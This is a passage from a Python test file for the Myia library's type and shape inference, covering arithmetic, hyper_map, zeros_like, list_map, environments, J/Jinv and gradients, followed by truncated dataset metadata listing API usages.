[[{'type': i64}, {'type': i64}],\n [{'type': i64}, {'type': f64}]]:\n\n results = pip.run(input=fn, argspec=argspec)\n rval = results['outspec']\n\n assert rval['type'] == f64\n\n\ndef test_forced_function_type():\n\n @pipeline_function\n def mod(self, graph):\n # Force the inferred tyoe of scalar_add to be (i64,i64)->f64\n scalar_add = graph.output.inputs[0]\n scalar_add.inferred['type'] = F[[i64, i64], f64]\n return graph\n\n def fn(x, y):\n return x + y\n\n pip = infer_pipeline.insert_before('infer', mod=mod)\n\n # Test correct\n\n results = pip.run(\n input=fn,\n argspec=[{'type': i64}, {'type': i64}]\n )\n rval = results['outspec']\n\n assert rval['type'] == f64\n\n # Test mismatch\n\n with pytest.raises(InferenceError):\n results = pip.run(\n input=fn,\n argspec=[{'type': i64}, {'type': f64}]\n )\n\n # Test narg mismatch\n\n def fn2(x):\n return fn(x)\n\n with pytest.raises(InferenceError):\n results = pip.run(\n input=fn2,\n argspec=[{'type': i64}]\n )\n\n\n###########################\n# Using standard_pipeline #\n###########################\n\n\n@infer_std(\n type=[\n (i64, i64, i64),\n (ai64_of(7, 9), ai64_of(7, 9), ai64),\n (ai64_of(7, 9), i64, ai64),\n (i64, ai64_of(7, 9), ai64),\n (i64, f64, InferenceError),\n ({'type': i64, 'value': 3}, ai64_of(7, 9), ai64)\n ],\n shape=[\n (ai64_of(2, 5), ai64_of(2, 5), (2, 5)),\n (ai64_of(2, 5), ai64_of(2, 1), (2, 5)),\n (ai64_of(1, 5), ai64_of(2, 1), (2, 5)),\n (ai64_of(5,), ai64_of(2, 1), (2, 5)),\n (ai64_of(2, 3, 4), ai64_of(3, 4), (2, 3, 4)),\n (ai64_of(5,), ai64_of(2,), InferenceError),\n ({'type': i64}, ai64_of(2, 5), (2, 5)),\n (ai64_of(2, 5), {'type': i64}, (2, 5)),\n ]\n)\ndef test_add_std(x, y):\n return x + y\n\n\n@infer_std(type=[(i64, i64, i64),\n (ai64_of(7, 9), i64, InferenceError)])\ndef test_max_std(x, y):\n if x > y:\n return x\n else:\n return y\n\n\n@infer_std(\n type=[\n (f64, f64),\n (i64, i64),\n (af32_of(2, 5), af32),\n ]\n)\ndef test_add1_stdx(x):\n return 1 + x\n\n\ndef _add(x, y):\n return x + y\n\n\n@infer_std(\n type=[\n (f64, f64),\n (i64, i64),\n ]\n)\ndef test_add1_std_indirect(x):\n return _add(1, x)\n\n\ndef _interference_helper(x):\n if hastype(x, T):\n return x[0]\n else:\n return x\n\n\n@infer(\n type=[\n (i64, i64),\n (f64, f64),\n ]\n)\ndef test_add1_hastype_interference(x):\n return x + _interference_helper(1)\n\n\n@infer(\n type=[\n (f16, f32, f64, f32),\n ]\n)\ndef test_hastype_interference(x, y, z):\n if hastype(1, i32):\n return x\n elif hastype(1, i64):\n return y\n else:\n return z\n\n\n@infer(\n type=[\n (Point_t, i64),\n ],\n value=[\n (Point(3, 4), 7),\n ({'type': Point_t, 'value': ANYTHING}, ANYTHING),\n ],\n shape=[\n (t(Point_t), NOSHAPE)\n ]\n)\ndef test_class(pt):\n return pt.x + pt.y\n\n\n@infer(\n type=[\n (Point_t, i64),\n ],\n value=[\n (Point(3, 4), 5),\n ]\n)\ndef test_dataclass_method(pt):\n return pt.abs()\n\n\n@infer(\n type=[\n (i64, i64, i64, i64, Point_t),\n (f64, f64, f64, f64, InferenceError),\n ],\n value=[\n (1, 2, 3, 4, Point(4, 6)),\n ],\n shape=[\n (t(i64), t(i64), t(i64), t(i64),\n ClassShape({'x': NOSHAPE, 'y': NOSHAPE}))\n ]\n)\ndef test_dataclass_inst(x1, y1, x2, y2):\n pt1 = Point(x1, y1)\n pt2 = Point(x2, y2)\n return Point(pt1.x + pt2.x, pt1.y + pt2.y)\n\n\n@infer(type=[(Point_t, InferenceError)])\ndef test_dataclass_wrong_field(pt):\n return pt.z\n\n\nhyper_map = HyperMap()\nhyper_map_notuple = HyperMap(nonleaf=(A, Class))\nhyper_map_nobroadcast = HyperMap(broadcast=False)\n\n\n@infer(\n type=[\n (i64, i64, i64),\n (f64, f64, f64),\n (lf64, lf64, lf64),\n (L[lf64], L[lf64], L[lf64]),\n (lf64, f64, InferenceError),\n (L[f64], L[lf64], InferenceError),\n (T[i64, f64], T[i64, f64], T[i64, f64]),\n (Point_t, Point_t, Point_t),\n (ai64_of(2, 5), ai64_of(2, 5), ai64),\n (i64, f64, InferenceError),\n (lf64, f64, InferenceError),\n (ai64_of(2, 5), af64_of(2, 5), InferenceError),\n ],\n value=[\n (1, 2, 3),\n (4.5, 7.5, 12.0),\n (Point(1, 2), Point(3, 4), Point(4, 6)),\n ],\n shape=[\n (ai64_of(2, 5), ai64_of(2, 5), (2, 5)),\n (ai64_of(2, 5), ai64_of(2, 1), (2, 5)),\n (ai64_of(2, 5), {'type': i64}, (2, 5)),\n ]\n)\ndef test_hyper_map(x, y):\n return hyper_map(scalar_add, x, y)\n\n\n@infer(\n type=[\n (T[i64, f64], T[i64, f64], InferenceError),\n ],\n)\ndef test_hyper_map_notuple(x, y):\n return hyper_map_notuple(scalar_add, x, y)\n\n\n@infer(\n shape=[\n (ai64_of(2, 5), ai64_of(2, 5), (2, 5)),\n (ai64_of(2, 5), ai64_of(2, 1), InferenceError),\n (ai64_of(2, 5), {'type': i64}, InferenceError),\n ]\n)\ndef test_hyper_map_nobroadcast(x, y):\n return hyper_map_nobroadcast(scalar_add, x, y)\n\n\n@infer(\n type=[\n (i64, i64, i64),\n (f64, f64, f64),\n (lf64, lf64, lf64),\n (T[i64, f64], T[i64, f64], T[i64, f64]),\n (Point_t, Point_t, Point_t),\n (ai64_of(2, 5), ai64_of(2, 5), ai64),\n (Env, Env, Env),\n ],\n value=[\n (1, 2, 3),\n (4.5, 7.5, 12.0),\n (Point(1, 2), Point(3, 4), Point(4, 6)),\n ],\n shape=[\n (ai64_of(2, 5), ai64_of(2, 5), (2, 5)),\n (ai64_of(2, 5), ai64_of(2, 1), (2, 5)),\n (ai64_of(2, 5), {'type': i64}, (2, 5)),\n ]\n)\ndef test_hyper_add(x, y):\n return hyper_add(x, y)\n\n\n@infer(\n type=[\n (i64, i64),\n (f64, f64),\n (lf64, lf64),\n (T[i64, f64], T[i64, f64]),\n (Point_t, Point_t),\n (ai64_of(2, 5), ai64),\n (af32_of(2, 5), af32),\n ],\n value=[\n (1, 0),\n ((2, 3.0), (0, 0.0)),\n (Point(1, 2), Point(0, 0)),\n ],\n shape=[\n (ai64_of(2, 5), (2, 5)),\n (af32_of(2, 5), (2, 5)),\n ]\n)\ndef test_zeros_like(x):\n return zeros_like(x)\n\n\n@infer(type=[(i64, Env)])\ndef test_zeros_like_fn(x):\n def f(y):\n return x + y\n return zeros_like(f)\n\n\n@infer(\n type=[\n (li64, lf64, T[li64, lf64]),\n (li64, f64, InferenceError),\n ]\n)\ndef test_list_map(xs, ys):\n\n def square(x):\n return x * x\n\n return list_map(square, xs), list_map(square, ys)\n\n\n@infer(\n type=[\n (li64, li64, li64),\n (li64, lf64, InferenceError),\n ]\n)\ndef test_list_map2(xs, ys):\n\n def mulm(x, y):\n return x * -y\n\n return list_map(mulm, xs, ys)\n\n\n@infer(type=[(InferenceError,)])\ndef test_list_map0():\n\n def f():\n return 1234\n\n return list_map(f)\n\n\n@infer(\n type=[\n (i32, i32, i32, i32),\n (i32, f32, i32, InferenceError),\n (i32, i32, f32, InferenceError),\n ]\n)\ndef test_env(x, y, z):\n e = newenv\n e = env_setitem(e, embed(x), y)\n return env_getitem(e, embed(x), z)\n\n\n@infer(\n type=[\n (i32, T[JT[i32], Env, i32]),\n (f64, T[JT[f64], Env, f64]),\n ]\n)\ndef test_J(x):\n def f(x):\n return x * x\n\n jf = J(f)\n jx = J(x)\n jy, bprop = jf(jx)\n df, dx = bprop(1.0)\n return jy, df, dx\n\n\n@infer(\n type=[\n (JT[i32], i32),\n (JT[L[i32]], L[i32]),\n (i32, InferenceError),\n ]\n)\ndef test_Jinv(x):\n return Jinv(x)\n\n\n@infer_std(\n type=[\n (i32, i32),\n (f64, f64),\n (ai64_of(4, 5), ai64),\n ],\n shape=[\n (ai64_of(4, 5), (4, 5))\n ]\n)\ndef test_Jinv2(x):\n def f(x):\n return x * x\n\n ff = Jinv(J(f))\n return ff(x)\n\n\n@infer(type=[(i32, InferenceError)])\ndef test_Jinv3(x):\n def f(x):\n return x * x\n return Jinv(f)(x)\n\n\n@infer_std(\n type=[\n (af32_of(5, 7), T[f32, T[Env, af32]]),\n ],\n shape=[\n (af32_of(5, 7),\n TupleShape((NOSHAPE, TupleShape((NOSHAPE, (5, 7))))))\n ],\n)\ndef test_J_array(xs):\n def prod(xs):\n p = array_reduce(lambda x, y: x * y, xs, ())\n return array_to_scalar(p)\n jy, bprop = J(prod)(J(xs))\n return Jinv(jy), bprop(1.0)\n\n\n@infer_std(\n type=[\n (f32, f32, f32),\n (i16, i16, i16),\n ]\n)\ndef test_grad(x, y):\n def f(x, y):\n return x * (y + x)\n return grad(f)(x, y)\n\n\n@infer_std(\n type=[\n (i64, i64),\n (f32, f32),\n (f64, f64),\n ]\n)\ndef test_grad_cast(x):\n def f(x):\n return scalar_cast(x, f16)\n\n return grad(f)(x)\n\n\n@infer_std(\n type=[\n (af16_of(2, 5), af16_of(2, 5), af16),\n ],\n shape=[\n (af16_of(2, 5), af16_of(2, 5), (2, 5)),\n ]\n)\ndef test_grad_reduce(xs, ys):\n def f(xs, ys):\n return array_reduce(scalar_add, xs * ys, ())\n\n return grad(f)(xs, ys)\n", "sub_path": "tests/test_infer.py", "file_name": "test_infer.py", "file_ext": "py", "file_size_in_byte": 46722, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "common.ai64", "line_number": 40, "usage_type": "name"}, {"api_name": "common.ai32", "line_number": 44, "usage_type": "name"}, {"api_name": "common.af64", "line_number": 48, "usage_type": "name"}, {"api_name": "common.af32", "line_number": 52, "usage_type": "name"}, {"api_name": "common.af16", "line_number": 56, "usage_type": "name"}, {"api_name": "myia.prim.Primitive", "line_number": 72, "usage_type": "call"}, {"api_name": "inspect.getfullargspec", "line_number": 73, "usage_type": "call"}, {"api_name": "myia.infer.register_inferrer", "line_number": 88, "usage_type": "call"}, {"api_name": "myia.dtype.Int", "line_number": 101, "usage_type": "name"}, {"api_name": "myia.dtype.Float", "line_number": 101, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 104, "usage_type": "name"}, {"api_name": "myia.dtype.Int", "line_number": 116, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 119, "usage_type": "name"}, {"api_name": "myia.utils.RestrictedVar", "line_number": 131, "usage_type": "call"}, {"api_name": "common.i16", "line_number": 131, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 131, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 135, "usage_type": "name"}, {"api_name": "myia.utils.RestrictedVar", "line_number": 144, "usage_type": "call"}, {"api_name": "common.i16", "line_number": 144, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 144, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 148, "usage_type": "name"}, {"api_name": "myia.pipeline.scalar_pipeline.select", "line_number": 151, "usage_type": "call"}, {"api_name": "myia.pipeline.scalar_pipeline", "line_number": 151, "usage_type": "name"}, {"api_name": "myia.pipeline.standard_pipeline.select", "line_number": 163, "usage_type": "call"}, {"api_name": "myia.pipeline.standard_pipeline", "line_number": 163, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 231, "usage_type": "argument"}, {"api_name": "myia.debug.traceback.print_inference_error", "line_number": 232, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 242, "usage_type": "name"}, {"api_name": "myia.debug.traceback.print_inference_error", "line_number": 243, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 246, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 246, "usage_type": "attribute"}, {"api_name": "common.i64", "line_number": 260, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 261, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 262, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 262, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 262, "usage_type": "name"}, {"api_name": "common.B", "line_number": 263, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 263, "usage_type": "name"}, {"api_name": "myia.infer.CONTEXTLESS", "line_number": 268, "usage_type": "name"}, {"api_name": "myia.infer.Contextless.empty", "line_number": 269, "usage_type": "call"}, {"api_name": "myia.infer.Contextless", "line_number": 269, "usage_type": "name"}, {"api_name": "myia.ir.Graph", "line_number": 270, "usage_type": "call"}, {"api_name": "myia.ir.Graph", "line_number": 271, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 274, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 280, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 285, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 290, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 295, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 306, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 307, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 309, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 309, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 309, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 310, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 310, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 310, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 311, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 311, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 311, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 313, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 313, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 314, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 314, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 320, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 320, "usage_type": "name"}, {"api_name": "common.B", "line_number": 320, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 320, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 333, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 326, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 326, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 327, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 328, "usage_type": "name"}, {"api_name": "common.af64", "line_number": 329, "usage_type": "name"}, {"api_name": "common.B", "line_number": 330, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 330, "usage_type": "name"}, {"api_name": "common.B", "line_number": 338, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 338, "usage_type": "name"}, {"api_name": "common.B", "line_number": 339, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 339, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 339, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 339, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 340, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 340, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 341, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 341, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 345, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 345, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 345, "usage_type": "name"}, {"api_name": "common.B", "line_number": 350, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 350, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 370, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 371, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 371, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 372, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 373, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 377, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 390, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 390, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 391, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 391, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 391, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 392, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 392, "usage_type": "name"}, {"api_name": "common.T", "line_number": 393, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 393, "usage_type": "name"}, {"api_name": "common.T", "line_number": 394, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 394, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 394, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 394, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 404, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 404, "usage_type": "name"}, {"api_name": "common.T", "line_number": 404, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_mul", "line_number": 418, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 415, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 415, "usage_type": "name"}, {"api_name": "common.T", "line_number": 415, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_mul", "line_number": 425, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 423, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 423, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_mul", "line_number": 430, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 428, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 428, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 433, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 433, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 440, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 440, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 447, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 447, "usage_type": "name"}, {"api_name": "common.T", "line_number": 447, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 448, "usage_type": "argument"}, {"api_name": "common.f64", "line_number": 448, "usage_type": "argument"}, {"api_name": "myia.dshape.TupleShape", "line_number": 448, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 448, "usage_type": "name"}, {"api_name": "common.T", "line_number": 449, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 449, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 449, "usage_type": "argument"}, {"api_name": "myia.dshape.TupleShape", "line_number": 450, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 450, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 455, "usage_type": "name"}, {"api_name": "common.L", "line_number": 455, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 456, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 456, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 456, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 457, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 457, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 458, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 458, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 459, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 459, "usage_type": "argument"}, {"api_name": "common.L", "line_number": 460, "usage_type": "name"}, {"api_name": "myia.dtype.Array", "line_number": 460, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 460, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 460, "usage_type": "call"}, {"api_name": "common.L", "line_number": 461, "usage_type": "name"}, {"api_name": "myia.dtype.Array", "line_number": 461, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 461, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 461, "usage_type": "call"}, {"api_name": "myia.dshape.ListShape", "line_number": 462, "usage_type": "call"}, {"api_name": "myia.infer.ANYTHING", "line_number": 462, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 463, "usage_type": "call"}, {"api_name": "myia.dshape.ListShape", "line_number": 464, "usage_type": "call"}, {"api_name": "myia.infer.ANYTHING", "line_number": 464, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 469, "usage_type": "name"}, {"api_name": "common.L", "line_number": 469, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 470, "usage_type": "name"}, {"api_name": "common.L", "line_number": 470, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 471, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 471, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 472, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 472, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 472, "usage_type": "name"}, {"api_name": "common.L", "line_number": 477, "usage_type": "name"}, {"api_name": "myia.dtype.Problem", "line_number": 477, "usage_type": "name"}, {"api_name": "myia.infer.VOID", "line_number": 477, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 478, "usage_type": "name"}, {"api_name": "myia.prim.ops.tuple_len", "line_number": 497, "usage_type": "call"}, {"api_name": "myia.prim.ops", "line_number": 497, "usage_type": "name"}, {"api_name": "common.T", "line_number": 485, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 485, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 485, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 486, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 486, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 487, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 488, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 488, "usage_type": "name"}, {"api_name": "myia.prim.ops.list_len", "line_number": 509, "usage_type": "call"}, {"api_name": "myia.prim.ops", "line_number": 509, "usage_type": "name"}, {"api_name": "common.T", "line_number": 502, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 502, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 502, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 502, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 503, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 503, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 504, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 505, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 505, "usage_type": "name"}, {"api_name": "myia.prim.ops.array_len", "line_number": 521, "usage_type": "call"}, {"api_name": "myia.prim.ops", "line_number": 521, "usage_type": "name"}, {"api_name": "common.T", "line_number": 514, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 514, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 514, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 514, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 515, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 515, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 516, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 517, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 517, "usage_type": "name"}, {"api_name": "myia.composite.tail", "line_number": 532, "usage_type": "call"}, {"api_name": "common.T", "line_number": 524, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 524, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 524, "usage_type": "name"}, {"api_name": "common.T", "line_number": 525, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 525, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 525, "usage_type": "name"}, {"api_name": "common.T", "line_number": 526, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 526, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 527, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 527, "usage_type": "name"}, {"api_name": "common.T", "line_number": 528, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 528, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 528, "usage_type": "name"}, {"api_name": "myia.dshape.TupleShape", "line_number": 528, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 528, "usage_type": "name"}, {"api_name": "common.T", "line_number": 529, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 529, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 529, "usage_type": "name"}, {"api_name": "myia.dshape.TupleShape", "line_number": 530, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 530, "usage_type": "name"}, {"api_name": "myia.composite.tail", "line_number": 537, "usage_type": "call"}, {"api_name": "common.T", "line_number": 535, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 535, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 535, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 535, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 540, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 540, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 541, "usage_type": "argument"}, {"api_name": "common.f64", "line_number": 541, "usage_type": "argument"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 541, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 546, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 546, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 551, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 551, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 551, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 556, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 556, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 556, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 563, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 563, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 564, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 564, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 564, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 565, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 565, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 565, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 566, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 566, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 566, "usage_type": "name"}, {"api_name": "common.T", "line_number": 567, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 567, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 567, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 567, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.tuple_setitem", "line_number": 584, "usage_type": "call"}, {"api_name": "common.T", "line_number": 576, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 576, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 576, "usage_type": "name"}, {"api_name": "common.T", "line_number": 577, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 577, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 577, "usage_type": "name"}, {"api_name": "common.T", "line_number": 578, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 578, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 578, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 578, "usage_type": "name"}, {"api_name": "common.T", "line_number": 579, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 579, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 579, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 579, "usage_type": "name"}, {"api_name": "common.T", "line_number": 580, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 580, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 580, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 580, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.list_setitem", "line_number": 595, "usage_type": "call"}, {"api_name": "common.li64", "line_number": 589, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 589, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 590, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 590, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 590, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 590, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 591, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 591, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 591, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 591, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 598, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 598, "usage_type": "name"}, {"api_name": "common.T", "line_number": 598, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 614, "usage_type": "name"}, {"api_name": "common.T", "line_number": 614, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 615, "usage_type": "name"}, {"api_name": "common.T", "line_number": 615, "usage_type": "name"}, {"api_name": "common.i64", 